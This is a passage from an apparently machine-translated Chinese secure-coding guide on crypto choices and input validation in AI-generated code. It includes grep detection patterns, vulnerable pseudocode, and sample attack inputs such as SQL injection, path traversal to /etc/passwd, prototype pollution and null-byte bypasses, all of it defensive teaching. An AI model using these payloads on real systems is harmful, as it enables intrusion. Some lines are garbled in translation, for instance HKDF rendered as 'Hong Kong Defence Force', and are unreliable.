| 算法 | 用例 | 笔记 |
|---|---|---|
| Argon2id | 基于密码 | 最适合密码 → 密钥 |
| 香港防卫部队 | 关键扩展 | 从单个键派生多个键 |
| PBKDF2-SHA256 | 兼容性 | 需要 60 万次以上迭代 |
避免使用:基于 MD5 的密钥派生函数、单次哈希派生、低迭代次数
| 算法 | 输出 | 用例 | 笔记 |
|---|---|---|---|
| HMAC-SHA256 | 256 位 | 通用 | 标准选择 |
| HMAC-SHA512 | 512 位 | 额外安全边际 | 64 位系统运行速度更快 |
| Poly1305 | 128 位 | 与 ChaCha20 | AEAD 的一部分 |
避免使用: MD5、SHA1、未构建 HMAC 的普通哈希算法
| 算法 | 用例 | 笔记 |
|---|---|---|
| Ed25519 | 通用 | 快速、安全、简单的 API |
| ECDSA P-256 | 兼容性 | 广泛支持 |
| RSA-PSS | 遗留系统 | 需要 2048 位以上的密钥 |
避免使用: RSA PKCS#1 v1.5、DSA、ECDSA 等弱曲线加密算法。
// RED FLAGS in cryptographic code:
// 1. Weak hash functions
md5( // Search for: md5\s*\(
sha1( // Search for: sha1\s*\(
SHA1.Create() // Search for: SHA1
// 2. ECB mode
mode = "ECB" // Search for: ECB
AES/ECB/ // Search for: /ECB/
mode_ECB // Search for: ECB
// 3. Static or weak IVs
iv = [0, 0, 0, ... // Search for: iv\s*=\s*\[0
IV = "0000 // Search for: IV\s*=\s*["']0
static IV // Search for: static.*[Ii][Vv]
// 4. Math.random for security
Math.random() // Search for: Math\.random
random.randint( // Search for: randint\( (context matters)
// 5. Weak secrets
= "secret" // Search for: =\s*["']secret
SECRET = " // Search for: SECRET\s*=\s*["']
= "password" // Search for: =\s*["']password
// 6. Direct password use as key
key = password // Search for: key\s*=\s*password
AES(password) // Search for: AES\s*\(\s*password
// 7. Low iteration counts
iterations: 1000 // Search for: iterations.*\d{1,4}[^0-9]
rounds = 100 // Search for: rounds\s*=\s*\d{1,3}[^0-9]
// GREP patterns for security review:
// [Mm][Dd]5\s*\(
// [Ss][Hh][Aa]1\s*\(
// ECB
// [Ii][Vv]\s*=\s*\[0
// Math\.random
// iterations.*[0-9]{1,4}[^0-9]
// (password|secret)\s*=\s*["']
// Cryptographic security test cases:
// 1. Algorithm verification
- [ ] No MD5 or SHA1 for password hashing
- [ ] No ECB mode encryption
- [ ] AES key size is 256 bits (not 128)
- [ ] Authenticated encryption used (GCM, ChaCha20-Poly1305)
// 2. Randomness verification
- [ ] IVs/nonces are cryptographically random
- [ ] Session tokens use CSPRNG
- [ ] No predictable seeds for random generation
// 3. Key management
- [ ] Keys not hardcoded in source
- [ ] Keys not logged or exposed in errors
- [ ] Key derivation uses appropriate KDF
- [ ] Key rotation mechanism exists
// 4. Password hashing
- [ ] bcrypt cost ≥ 12 or Argon2 with appropriate params
- [ ] Unique salt per password
- [ ] Timing-safe comparison used
// 5. Implementation details
- [ ] Constant-time comparison for secrets
- [ ] No padding oracle vulnerabilities
- [ ] HMAC used (not hash(key+message))
- [ ] Authenticated encryption or encrypt-then-MAC
CWE 参考: CWE-20(输入验证不当)、CWE-1286(输入语法正确性验证不当)、CWE-185(正则表达式错误)、CWE-1333(正则表达式复杂度过高)、CWE-129(数组索引验证不当)
优先级评分: 21(频率:9,严重性:7,可检测性:5)
输入验证是抵御几乎所有注入攻击、数据损坏和应用程序崩溃的第一道防线。然而,人工智能生成的代码却常常未能实现适当的验证,要么将其视为事后考虑,要么干脆忽略。
为什么人工智能模型会跳过或失败输入验证:
训练数据侧重于“正常路径”:大多数教程代码、文档示例和 Stack Overflow 回答都演示了在预期输入下的功能。为了简洁起见,验证代码通常被省略,这使得人工智能认为验证是可选的。
验证具有上下文相关性:正确的验证取决于业务规则、数据类型和下游用途——而人工智能往往缺乏这些上下文信息。模型无法知道“姓名”字段不应超过 100 个字符,或者“年龄”必须介于 0 到 150 之间。
客户端验证看似完成:人工智能训练数据通常包含客户端表单验证(JavaScript)。模型学习了这些模式,但未能理解服务器端验证才是真正的安全边界。
正则表达式复杂度:人工智能生成的复杂正则表达式模式可能容易受到灾难性回溯攻击(ReDoS)或遗漏极端情况。该模型优化的是匹配预期模式,而不是拒绝恶意模式。
信任边界混乱:人工智能本身并不了解哪些数据源是可信的。它可能会验证用户表单输入,但也会信任来自内部API、数据库或消息队列的数据,而这些数据也可能已被攻破。
类型系统过度自信:在类型化语言中,人工智能可能会认为类型声明就足以进行验证,从而忽略了范围检查、格式验证和语义约束的必要性。
为什么这很重要——所有注入攻击的基础:
所有主要漏洞类别都源于输入验证不足:
影响统计数据:
// VULNERABLE: All validation in frontend, server trusts everything
// Frontend validation (JavaScript)
function validateForm(form):
if form.email is empty:
showError("Email required")
return false
if not isValidEmail(form.email):
showError("Invalid email format")
return false
if form.password.length < 8:
showError("Password must be 8+ characters")
return false
if form.age < 0 or form.age > 150:
showError("Invalid age")
return false
// Form is "valid", submit to server
return true
// Backend endpoint (VULNERABLE - no validation)
function handleRegistration(request):
// AI assumes frontend validated, so just use the data
email = request.body.email // Could be anything
password = request.body.password // Could be empty
age = request.body.age // Could be -1 or 9999999
// Directly store in database
query = "INSERT INTO users (email, password, age) VALUES (?, ?, ?)"
database.execute(query, [email, hashPassword(password), age])
return {"success": true}
为什么这样做很危险:
攻击场景:
// Attacker sends directly to API:
POST /api/register
Content-Type: application/json
{
"email": "'; DROP TABLE users; --",
"password": "",
"age": -9999999999
}
// VULNERABLE: Validates type exists, ignores business constraints
function processPayment(request):
// Type checking only
if typeof(request.amount) != "number":
return error("Amount must be a number")
if typeof(request.quantity) != "integer":
return error("Quantity must be an integer")
// MISSING: Range validation
// amount could be negative (refund attack)
// quantity could be 0 or MAX_INT (business logic bypass)
total = request.amount * request.quantity
chargeCustomer(request.customerId, total)
return {"charged": total}
// Attacker exploits:
{
"amount": -100.00, // Negative = credit instead of charge
"quantity": 999999999, // Integer overflow potential
"customerId": "12345"
}
为什么这样做很危险:
// VULNERABLE: Regex matches substring, not entire input
// Email validation without anchors
EMAIL_PATTERN = "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}"
function validateEmail(email):
if regex.match(EMAIL_PATTERN, email):
return true
return false
// This PASSES validation:
validateEmail("MALICIOUS_PAYLOAD user@example.com MALICIOUS_PAYLOAD")
// Because "user@example.com" matches somewhere in the string
// Filename validation without anchors
SAFE_FILENAME = "[a-zA-Z0-9_-]+"
function validateFilename(filename):
if regex.match(SAFE_FILENAME, filename):
return true
return false
// This PASSES validation:
validateFilename("../../../etc/passwd")
// Because "etc" matches the pattern somewhere in the string
为什么这样做很危险:
修复预览:
// SECURE: Use ^ and $ anchors to match entire input
EMAIL_PATTERN = "^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$"
SAFE_FILENAME = "^[a-zA-Z0-9_-]+$"
// VULNERABLE: Catastrophic backtracking regex patterns
// Email validation with ReDoS vulnerability
// Pattern: nested quantifiers with overlapping character classes
VULNERABLE_EMAIL = "^([a-zA-Z0-9]+)*@[a-zA-Z0-9]+\.[a-zA-Z]+$"
// Attack input: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!"
// The regex engine backtracks exponentially trying all combinations
// URL validation with ReDoS
VULNERABLE_URL = "^(https?:\/\/)?([\da-z\.-]+)\.([a-z\.]{2,6})([\/\w \.-]*)*\/?$"
// Attack input: long string of valid URL characters followed by invalid character
// "http://example.com/" + "a" * 30 + "!"
// Naive duplicate word finder (common tutorial example)
DUPLICATE_WORDS = "\b(\w+)\s+\1\b"
// Can hang on: "word word word word word word word word word word!"
function validateInput(input, pattern):
// This can hang for minutes or crash the server
return regex.match(pattern, input)
为什么这样做很危险:
(a+)+, (a*)*”(a?)*是危险信号。ReDoS 复杂性分析:
// Pattern: (a+)+$
// Input: "aaaaaaaaaaaaaaaaaaaaaaaaX"
//
// For 25 'a's followed by 'X':
// - The engine tries every possible way to split the 'a's between groups
// - Time complexity: O(2^n) where n is input length
// - 25 chars = 33 million+ combinations to try
// - 30 chars = 1 billion+ combinations
// VULNERABLE: Assumes data structure completeness
function processUserProfile(user):
// No null checks - any missing field crashes
fullName = user.firstName + " " + user.lastName // Crash if null
emailDomain = user.email.split("@")[1] // Crash if email is null
age = parseInt(user.profile.age) // Crash if profile is null
// Process address (deeply nested)
city = user.profile.address.city.toUpperCase() // Multiple crash points
return {
"name": fullName,
"domain": emailDomain,
"age": age,
"city": city
}
// API returns partial data:
{
"firstName": "John",
"lastName": null, // Could be null
"email": null, // Could be missing
"profile": {
"age": "25"
// address is missing entirely
}
}
为什么这样做很危险:
// VULNERABLE: Using user input directly as array index
function getItemByIndex(request):
items = ["item0", "item1", "item2", "item3", "item4"]
index = request.params.index // User-provided
// No validation - trusts user to provide valid index
return items[index] // Out of bounds or negative index
// Worse: Array index used for data access
function getUserData(request):
userIndex = parseInt(request.params.id)
// Could access negative index, other users' data, or crash
return allUsersData[userIndex]
// Object property access from user input
function getConfigValue(request):
configKey = request.params.key
// Prototype pollution or access to __proto__, constructor
return config[configKey]
为什么这样做很危险:
__proto__,,键constructor可以prototype修改对象行为攻击场景:
// Array out of bounds:
GET /items?index=99999999
GET /items?index=-1
// Prototype pollution via property access:
GET /config?key=__proto__
GET /config?key=constructor
POST /config {"key": "__proto__", "value": {"isAdmin": true}}
// SECURE: Comprehensive server-side validation with clear error messages
function handleRegistration(request):
errors = []
// Email validation
email = request.body.email
if email is null or email is empty:
errors.append({"field": "email", "message": "Email is required"})
else if length(email) > 254: // RFC 5321 limit
errors.append({"field": "email", "message": "Email too long"})
else if not isValidEmailFormat(email):
errors.append({"field": "email", "message": "Invalid email format"})
else if not isAllowedEmailDomain(email): // Business rule
errors.append({"field": "email", "message": "Email domain not allowed"})
// Password validation
password = request.body.password
if password is null or password is empty:
errors.append({"field": "password", "message": "Password is required"})
else if length(password) < 12:
errors.append({"field": "password", "message": "Password must be 12+ characters"})
else if length(password) > 128: // Prevent DoS via bcrypt
errors.append({"field": "password", "message": "Password too long"})
else if not meetsComplexityRequirements(password):
errors.append({"field": "password", "message": "Password too weak"})
// Age validation (integer with business range)
age = request.body.age
if age is null:
errors.append({"field": "age", "message": "Age is required"})
else if typeof(age) != "integer":
errors.append({"field": "age", "message": "Age must be a whole number"})
else if age < 13: // Business rule: minimum age
errors.append({"field": "age", "message": "Must be at least 13 years old"})
else if age > 150: // Sanity check
errors.append({"field": "age", "message": "Invalid age"})
// Return all errors at once (better UX than one at a time)
if errors.length > 0:
return {"success": false, "errors": errors}
// Only process after validation passes
hashedPassword = hashPassword(password)
createUser(email, hashedPassword, age)
return {"success": true}
为什么说它是安全的:
// SECURE: Declarative schema validation with robust library
// Define schema once, reuse everywhere
USER_REGISTRATION_SCHEMA = {
"type": "object",
"required": ["email", "password", "age", "name"],
"additionalProperties": false, // Reject unknown fields
"properties": {
"email": {
"type": "string",
"format": "email",
"maxLength": 254
},
"password": {
"type": "string",
"minLength": 12,
"maxLength": 128
},
"age": {
"type": "integer",
"minimum": 13,
"maximum": 150
},
"name": {
"type": "object",
"required": ["first", "last"],
"properties": {
"first": {
"type": "string",
"minLength": 1,
"maxLength": 100,
"pattern": "^[\\p{L}\\s'-]+$" // Unicode letters, spaces, hyphens, apostrophes
},
"last": {
"type": "string",
"minLength": 1,
"maxLength": 100,
"pattern": "^[\\p{L}\\s'-]+$"
}
}
}
}
}
function handleRegistration(request):
// Validate entire payload against schema
validationResult = schemaValidator.validate(request.body, USER_REGISTRATION_SCHEMA)
if not validationResult.valid:
return {
"success": false,
"errors": validationResult.errors // Detailed error per field
}
// Data is guaranteed to match schema structure and constraints
processRegistration(request.body)
return {"success": true}
// Additional business logic validation after schema validation
function processRegistration(data):
// Schema ensures structure; now check business rules
if isEmailAlreadyRegistered(data.email):
throw ValidationError("Email already registered")
if isCommonPassword(data.password):
throw ValidationError("Password is too common")
createUser(data)
为什么说它是安全的:
additionalProperties: false防止意外数据注入// SECURE: Anchored, bounded, and ReDoS-resistant patterns
// Email validation - anchored and bounded
// Note: Perfect email validation is complex; often better to just check format
// and verify via confirmation email
EMAIL_PATTERN = "^[a-zA-Z0-9._%+-]{1,64}@[a-zA-Z0-9.-]{1,253}\\.[a-zA-Z]{2,63}$"
// Safe filename - anchored, limited character set, bounded length
FILENAME_PATTERN = "^[a-zA-Z0-9][a-zA-Z0-9._-]{0,254}$"
// Safe identifier (alphanumeric + underscore, starts with letter)
IDENTIFIER_PATTERN = "^[a-zA-Z][a-zA-Z0-9_]{0,63}$"
// URL path segment - no special characters
PATH_SEGMENT_PATTERN = "^[a-zA-Z0-9._-]{1,255}$"
function validateWithSafeRegex(input, pattern, maxLength):
// Length check BEFORE regex (prevents ReDoS)
if input is null or length(input) > maxLength:
return false
// Use timeout-protected regex matching if available
try:
return regexMatchWithTimeout(pattern, input, timeout = 100ms)
catch TimeoutException:
logWarning("Regex timeout on input: " + truncate(input, 50))
return false
// For complex patterns, use atomic groups or possessive quantifiers
// (syntax varies by regex engine)
// VULNERABLE: (a+)+
// SAFE: (?>a+)+ (atomic group - no backtracking into group)
// SAFE: a++ (possessive quantifier - never backtracks)
// Alternative: Linear-time regex engines (RE2, rust regex)
// These reject patterns that could have exponential complexity
function validateWithLinearRegex(input, pattern):
// RE2 guarantees O(n) matching time
return RE2.match(pattern, input)
为什么说它是安全的:
^锚点$[a-zA-Z0-9]+相邻关系[a-z]+)。// SECURE: Explicit type handling with safe coercion
function parseIntegerSafe(value, min, max):
// Handle null/undefined
if value is null or value is undefined:
return {valid: false, error: "Value is required"}
// If already integer, validate range
if typeof(value) == "integer":
if value < min or value > max:
return {valid: false, error: "Value out of range: " + min + "-" + max}
return {valid: true, value: value}
// If string, parse carefully
if typeof(value) == "string":
// Check for valid integer string (no floats, no hex, no scientific)
if not regex.match("^-?[0-9]+$", value):
return {valid: false, error: "Invalid integer format"}
parsed = parseInt(value, 10) // Always specify radix
// Check for NaN (parsing failure)
if isNaN(parsed):
return {valid: false, error: "Could not parse integer"}
// Check for overflow
if parsed < MIN_SAFE_INTEGER or parsed > MAX_SAFE_INTEGER:
return {valid: false, error: "Integer overflow"}
// Range check
if parsed < min or parsed > max:
return {valid: false, error: "Value out of range: " + min + "-" + max}
return {valid: true, value: parsed}
// Reject all other types
return {valid: false, error: "Expected integer, got " + typeof(value)}
// Usage
function handlePayment(request):
amountResult = parseIntegerSafe(request.body.amount, 1, 1000000) // 1 cent to $10,000
if not amountResult.valid:
return error("amount: " + amountResult.error)
quantityResult = parseIntegerSafe(request.body.quantity, 1, 100)
if not quantityResult.valid:
return error("quantity: " + quantityResult.error)
// Safe to use validated integers
total = amountResult.value * quantityResult.value
processPayment(total)
为什么说它是安全的:
// SECURE: Allowlist approach - only accept known-good values
// For enum-like fields, use explicit allowlist
ALLOWED_COUNTRIES = ["US", "CA", "GB", "DE", "FR", "JP", "AU"]
ALLOWED_ROLES = ["user", "moderator", "admin"]
ALLOWED_SORT_FIELDS = ["name", "date", "price", "rating"]
ALLOWED_FILE_EXTENSIONS = [".jpg", ".jpeg", ".png", ".gif", ".pdf"]
function validateCountry(input):
// Case-insensitive comparison against allowlist
normalized = input.toUpperCase().trim()
if normalized in ALLOWED_COUNTRIES:
return {valid: true, value: normalized}
return {valid: false, error: "Invalid country code"}
function validateSortField(input):
// Exact match required
if input in ALLOWED_SORT_FIELDS:
return {valid: true, value: input}
return {valid: false, error: "Invalid sort field"}
function validateFileUpload(filename, content):
// Extension whitelist
extension = getExtension(filename).toLowerCase()
if extension not in ALLOWED_FILE_EXTENSIONS:
return {valid: false, error: "File type not allowed"}
// ALSO validate content type (magic bytes)
detectedType = detectFileType(content)
if detectedType.extension != extension:
return {valid: false, error: "File content doesn't match extension"}
// Additional: check file isn't actually executable or contains script
if containsExecutableContent(content):
return {valid: false, error: "File contains disallowed content"}
return {valid: true}
// For SQL column/table names (cannot be parameterized)
function validateColumnName(input, allowedColumns):
if input in allowedColumns:
return input // Safe to use in query
throw ValidationError("Invalid column name")
// Usage in query
function searchProducts(filters):
sortField = validateColumnName(filters.sortBy, ["name", "price", "created_at"])
sortOrder = filters.order == "desc" ? "DESC" : "ASC" // Binary choice
// Now safe to interpolate (they're from allowlist)
query = "SELECT * FROM products ORDER BY " + sortField + " " + sortOrder
return database.query(query)
为什么说它是安全的:
// SECURE: Normalize input before validation to prevent bypass
function validatePath(input):
// Step 1: Reject null bytes (used to bypass filters)
if contains(input, "\x00"):
return {valid: false, error: "Invalid character in path"}
// Step 2: Decode URL encoding (multiple rounds to catch double-encoding)
decoded = input
for i in range(3): // Max 3 rounds of decoding
newDecoded = urlDecode(decoded)
if newDecoded == decoded:
break // No more encoding to decode
decoded = newDecoded
// Step 3: Normalize path separators
normalized = decoded.replace("\\", "/")
// Step 4: Resolve path (remove . and ..)
resolved = resolvePath(normalized)
// Step 5: Check against allowed base directory
allowedBase = "/var/www/uploads/"
if not resolved.startsWith(allowedBase):
return {valid: false, error: "Path traversal detected"}
// Step 6: Check for remaining dangerous patterns
if contains(resolved, ".."):
return {valid: false, error: "Invalid path component"}
return {valid: true, value: resolved}
function validateUsername(input):
// Normalize Unicode before validation
// NFC = Canonical Composition (combines characters)
normalized = unicodeNormalize(input, "NFC")
// Check for confusable characters (homoglyphs)
if containsHomoglyphs(normalized):
return {valid: false, error: "Username contains confusable characters"}
// Now validate the normalized form
if not regex.match("^[a-zA-Z0-9_]{3,20}$", normalized):
return {valid: false, error: "Invalid username format"}
return {valid: true, value: normalized}
function validateUrl(input):
// Parse URL to get components
parsed = parseUrl(input)
if parsed is null:
return {valid: false, error: "Invalid URL"}
// Validate scheme (allowlist)
if parsed.scheme not in ["http", "https"]:
return {valid: false, error: "Only HTTP(S) URLs allowed"}
// Check for IP addresses (may be SSRF target)
if isIpAddress(parsed.host):
return {valid: false, error: "IP addresses not allowed"}
// Check for internal hostnames
if parsed.host.endsWith(".internal") or parsed.host == "localhost":
return {valid: false, error: "Internal URLs not allowed"}
// Check for credentials in URL
if parsed.username or parsed.password:
return {valid: false, error: "Credentials in URL not allowed"}
// Reconstruct URL from parsed components (normalizes encoding)
canonicalUrl = buildUrl(parsed.scheme, parsed.host, parsed.port, parsed.path)
return {valid: true, value: canonicalUrl}
为什么说它是安全的:
/./或/../file://。javascript:// DANGEROUS: Validating before normalization allows bypass
// Attack: Using decomposed Unicode characters
// "admin" can be represented as:
// - "admin" (5 ASCII characters)
// - "admin" with combining characters: "admin" + accent marks
// - Confusables: "αdmin" (Greek alpha), "аdmin" (Cyrillic a)
function vulnerableUsernameCheck(input):
if input == "admin":
return "Cannot register as admin"
return "OK"
// Attacker uses: "аdmin" (Cyrillic 'а' looks like Latin 'a')
vulnerableUsernameCheck("аdmin") // Returns "OK"
// But displays as "admin" in UI!
// SECURE: Normalize and check for confusables
function secureUsernameCheck(input):
// Step 1: Unicode normalize to NFC
normalized = unicodeNormalize(input, "NFC")
// Step 2: Convert confusables to ASCII equivalent
ascii = convertConfusablesToAscii(normalized)
// Step 3: Check reserved names against ASCII version
reservedNames = ["admin", "root", "system", "administrator", "support"]
if ascii.toLowerCase() in reservedNames:
return {valid: false, error: "Reserved username"}
// Step 4: Only allow safe character set
if not isAsciiAlphanumeric(input):
return {valid: false, error: "Username must be ASCII letters and numbers"}
return {valid: true, value: normalized}
检测:使用 Unicode 混淆字符(admin/root)、组合字符、零宽度字符进行测试。
// DANGEROUS: Null bytes can truncate strings in some languages
// Filename validation bypass with null byte
filename = "malicious.php\x00.jpg"
// In C/PHP, strcmp might only see "malicious.php\x00"
// The ".jpg" is ignored
if filename.endsWith(".jpg"):
uploadFile(filename) // Allows .php upload!
// Path validation bypass
path = "/safe/directory/../../etc/passwd\x00/safe/suffix"
// Validation sees: ends with "/safe/suffix" - looks OK
// File system sees: "/etc/passwd"
// SECURE: Strip null bytes first
function sanitizeInput(input):
// Remove null bytes entirely
sanitized = input.replace("\x00", "")
// Also remove other control characters
sanitized = removeControlCharacters(sanitized)
return sanitized
function validateFilename(input):
sanitized = sanitizeInput(input)
// Now validate
if sanitized != input:
return {valid: false, error: "Invalid characters in filename"}
// Continue with extension validation
// ...
检测:测试所有包含嵌入空字节(\x00,%00)的字符串输入。
// DANGEROUS: Loose type comparison leads to bypass
// JavaScript/PHP style loose comparison
function vulnerableAuth(password):
storedHash = "0e123456789" // Some MD5 hashes start with "0e"
inputHash = md5(password)
// In PHP: "0e123456789" == "0e987654321" is TRUE!
// Both are interpreted as 0 * 10^(number) = 0
if inputHash == storedHash: // Loose comparison
return "Authenticated"
return "Failed"
// Type confusion with arrays
function vulnerablePasswordReset(token):
// Expected: token = "abc123def456"
// Attack: token = {"$gt": ""} (MongoDB injection via type confusion)
if database.findOne({"resetToken": token}):
return "Token found"
// SECURE: Strict type checking
function secureAuth(password):
storedHash = getStoredHash(user)
inputHash = hashPassword(password)
// Strict comparison and constant-time
if typeof(inputHash) != "string" or typeof(storedHash) != "string":
return "Failed"
if not constantTimeEquals(inputHash, storedHash):
return "Failed"
return "Authenticated"
function securePasswordReset(token):
// Enforce string type
if typeof(token) != "string":
return {valid: false, error: "Invalid token format"}
// Validate format
if not regex.match("^[a-f0-9]{64}$", token):
return {valid: false, error: "Invalid token format"}
// Now safe to query
result = database.findOne({"resetToken": token})
// ...
检测:测试不同类型的数据:数组、对象、数字、布尔值,预期结果为字符串。
// DANGEROUS: Validation passes but computation overflows
function vulnerablePurchase(quantity, price):
// Validate ranges
if quantity < 0 or quantity > 1000000:
return error("Invalid quantity")
if price < 0 or price > 1000000:
return error("Invalid price")
// Both pass validation, but multiplication overflows!
// quantity = 999999, price = 999999
// total = 999998000001 (exceeds 32-bit integer)
total = quantity * price // OVERFLOW
chargeCustomer(total) // May wrap to negative or small number
// SECURE: Check for overflow in computation
function securePurchase(quantity, price):
// Validate individual ranges
if not isValidInteger(quantity, 1, 1000):
return error("Invalid quantity")
if not isValidInteger(price, 1, 10000000): // in cents
return error("Invalid price")
// Check multiplication won't overflow
MAX_SAFE_TOTAL = 2147483647 // 32-bit signed max
if quantity > MAX_SAFE_TOTAL / price:
return error("Order total too large")
total = quantity * price // Now safe
// Additional business validation
if total > MAX_ALLOWED_TRANSACTION:
return error("Transaction exceeds limit")
chargeCustomer(total)
// Alternative: Use arbitrary precision arithmetic for money
function securePurchaseWithDecimal(quantity, price):
quantityDecimal = Decimal(quantity)
priceDecimal = Decimal(price)
total = quantityDecimal * priceDecimal // No overflow
if total > Decimal(MAX_ALLOWED_TRANSACTION):
return error("Transaction exceeds limit")
chargeCustomer(total)
检测:使用 MAX_INT、MAX_INT-1、边界值以及相乘导致溢出的组合进行测试。
// WRONG: Validate after formatting
function displayUserData(userId):
userData = database.getUser(userId) // Raw from DB
// Format for display
formattedName = formatName(userData.name)
formattedBio = formatBio(userData.bio)
// Validating AFTER format - too late!
if containsHtml(formattedName): // Already formatted/escaped
return error("Invalid name")
return template.render(formattedName, formattedBio)
// CORRECT: Validate at input, encode at output
function saveUserData(request):
name = request.body.name
bio = request.body.bio
// Validate raw input BEFORE storing
if not isValidName(name):
return error("Invalid name")
if containsDangerousPatterns(bio):
return error("Invalid bio content")
// Store validated (but not encoded) data
database.saveUser({"name": name, "bio": bio})
function displayUserData(userId):
userData = database.getUser(userId)
// Encode for output context (don't validate again)
return template.render({
"name": htmlEncode(userData.name),
"bio": htmlEncode(userData.bio)
})
为什么这样做是错误的:
// WRONG: String operations on binary data
function processUploadedImage(fileContent):
// Convert binary to string - CORRUPTS DATA
contentString = fileContent.toString("utf-8")
// String operations fail on binary
if contentString.startsWith("\x89PNG"): // May not work correctly
processImage(contentString) // Corrupted!
// Regex on binary data is meaningless
if regex.match("<script>", contentString): // False sense of security
return error("Invalid image")
// CORRECT: Use binary operations for binary data
function processUploadedImage(fileContent):
// Keep as binary buffer
buffer = fileContent // Raw bytes
// Check magic bytes using binary comparison
PNG_MAGIC = bytes([0x89, 0x50, 0x4E, 0x47]) // \x89PNG
JPEG_MAGIC = bytes([0xFF, 0xD8, 0xFF])
if buffer.slice(0, 4) == PNG_MAGIC:
imageType = "png"
else if buffer.slice(0, 3) == JPEG_MAGIC:
imageType = "jpeg"
else:
return error("Unsupported image format")
// Use dedicated image library for validation
try:
image = imageLibrary.load(buffer)
// Validate image properties
if image.width > MAX_WIDTH or image.height > MAX_HEIGHT:
return error("Image too large")
// Re-encode image (strips any embedded code)
cleanBuffer = imageLibrary.encode(image, imageType)
return {valid: true, content: cleanBuffer}
catch ImageError:
return error("Invalid image file")
为什么这样做是错误的:
// WRONG: Different validation in different places
// API Endpoint 1: Strict validation
function createUserApi(request):
if not isValidEmail(request.email):
return error("Invalid email")
if not isStrongPassword(request.password):
return error("Weak password")
createUser(request.email, request.password)
// API Endpoint 2: No validation (developer forgot)
function createUserFromOAuth(oauthData):
// Trust OAuth provider's email
createUser(oauthData.email, generateRandomPassword())
// Internal function: Also no validation (assumes callers validated)
function createUserInternal(email, password):
// Directly insert to database - SQL injection if email not validated upstream
query = "INSERT INTO users (email, password) VALUES ('" + email + "', ?)"
database.execute(query, [password])
// CORRECT: Centralized validation
class UserValidator:
function validateEmail(email):
if email is null or email is empty:
throw ValidationError("Email required")
if length(email) > 254:
throw ValidationError("Email too long")
if not regex.match(EMAIL_PATTERN, email):
throw ValidationError("Invalid email format")
return email.toLowerCase().trim()
function validatePassword(password):
// ... password validation
return password
function validateUserData(data):
return {
"email": this.validateEmail(data.email),
"password": this.validatePassword(data.password)
}
// Single creation function used by all endpoints
function createUser(data):
validated = UserValidator.validateUserData(data)
// Now safe to use parameterized query
query = "INSERT INTO users (email, password) VALUES (?, ?)"
database.execute(query, [validated.email, hashPassword(validated.password)])
// All endpoints use the same function
function createUserApi(request):
createUser(request.body)
function createUserFromOAuth(oauthData):
createUser({"email": oauthData.email, "password": generateRandomPassword()})
为什么这样做是错误的:
// Layer 1: Transport-level validation (before application code)
// - Request size limits
// - Content-Type checking
// - Rate limiting
// Typically configured in web server/framework
// Layer 2: Schema validation (structure and types)
function validateSchema(data, schema):
return schemaValidator.validate(data, schema)
// Layer 3: Format validation (syntax)
function validateFormats(data):
errors = []
if data.email and not isValidEmailFormat(data.email):
errors.append("Invalid email format")
if data.url and not isValidUrl(data.url):
errors.append("Invalid URL format")
return errors
// Layer 4: Business rule validation (semantics)
function validateBusinessRules(data, context):
errors = []
if data.endDate < data.startDate:
errors.append("End date must be after start date")
if data.quantity > context.inventory.available:
errors.append("Insufficient inventory")
return errors
// Orchestration
function validateRequest(request, schema, context):
// Layer 2: Schema
schemaResult = validateSchema(request.body, schema)
if not schemaResult.valid:
return {valid: false, errors: schemaResult.errors, layer: "schema"}
// Layer 3: Format
formatErrors = validateFormats(request.body)
if formatErrors.length > 0:
return {valid: false, errors: formatErrors, layer: "format"}
// Layer 4: Business rules
businessErrors = validateBusinessRules(request.body, context)
if businessErrors.length > 0:
return {valid: false, errors: businessErrors, layer: "business"}
return {valid: true, data: request.body}
// Define validators as composable functions
validators = [
(data) => checkRequired(data, ["email", "password"]),
(data) => checkTypes(data, {email: "string", password: "string"}),
(data) => checkLength(data.email, 1, 254),
(data) => checkLength(data.password, 12, 128),
(data) => checkFormat(data.email, EMAIL_PATTERN),
(data) => checkPasswordStrength(data.password),
(data) => checkEmailNotRegistered(data.email) // Async/DB check
]
function validatePipeline(data, validators):
for validator in validators:
result = validator(data)
if not result.valid:
return result // Short-circuit on first failure
return {valid: true, data: data}
// Usage
result = validatePipeline(requestData, validators)
if not result.valid:
return error(result.message)
processValidatedData(result.data)
// Define validation rules per field
FIELD_RULES = {
"email": {
required: true,
type: "string",
maxLength: 254,
format: "email",
transform: (v) => v.toLowerCase().trim()
},
"age": {
required: true,
type: "integer",
min: 0,
max: 150
},
"role": {
required: true,
type: "string",
enum: ["user", "admin", "moderator"]
},
"tags": {
required: false,
type: "array",
items: {
type: "string",
maxLength: 50,
pattern: "^[a-z0-9-]+$"
},
maxItems: 10
}
}
function validateFields(data, rules):
result = {}
errors = []
for fieldName, fieldRules in rules:
value = data[fieldName]
// Required check
if fieldRules.required and (value is null or value is undefined):
errors.append({field: fieldName, message: "Required"})
continue
// Skip optional empty fields
if value is null or value is undefined:
continue
// Type check
if typeof(value) != fieldRules.type:
errors.append({field: fieldName, message: "Invalid type"})
continue
// Apply transform if exists
if fieldRules.transform:
value = fieldRules.transform(value)
// Range/length checks based on type
error = validateFieldConstraints(value, fieldRules)
if error:
errors.append({field: fieldName, message: error})
continue
result[fieldName] = value
if errors.length > 0:
return {valid: false, errors: errors}
return {valid: true, data: result}
// 1. Request body used directly without validation
request.body.xxx // Search for: request\.body\.\w+
req.params.xxx // Search for: req\.params\.\w+
request.query.xxx // Search for: request\.query\.\w+
// 2. Missing null checks before property access
user.profile.address // Search for: \w+\.\w+\.\w+ (chained access without ?.)
data.items[0] // Search for: \w+\[\d+\] (hardcoded array index)
// 3. Type coercion without validation
parseInt(xxx) // Search for: parseInt\([^,]+\) (no radix)
Number(xxx) // Search for: Number\(\w+
parseFloat(xxx) // Without subsequent isNaN check
// 4. Regex without anchors
/pattern/ // Search for: /[^/^][^$]+[^$/]/ (no ^ or $)
new RegExp("xxx") // Search for: new RegExp\("[^^]
// 5. Client-side validation only
if (form.valid) // Look for validation in frontend, missing in backend
validate() // In JS files, search corresponding backend endpoint
// 6. Array access from user input
array[userInput] // Search for: \[\w+\.\w+\] (property access with user data)
object[key] // Where key comes from request
// GREP patterns for security review:
// request\.(body|params|query)\.\w+
// parseInt\([^,)]+\)(?!\s*,\s*10)
// \.\w+\.\w+\.\w+(?!\?)
// /[^/]+/(?!.*[^\\]\$)
// Automated validation testing checklist:
// 1. Boundary testing
- Test with null, undefined, empty string for all fields
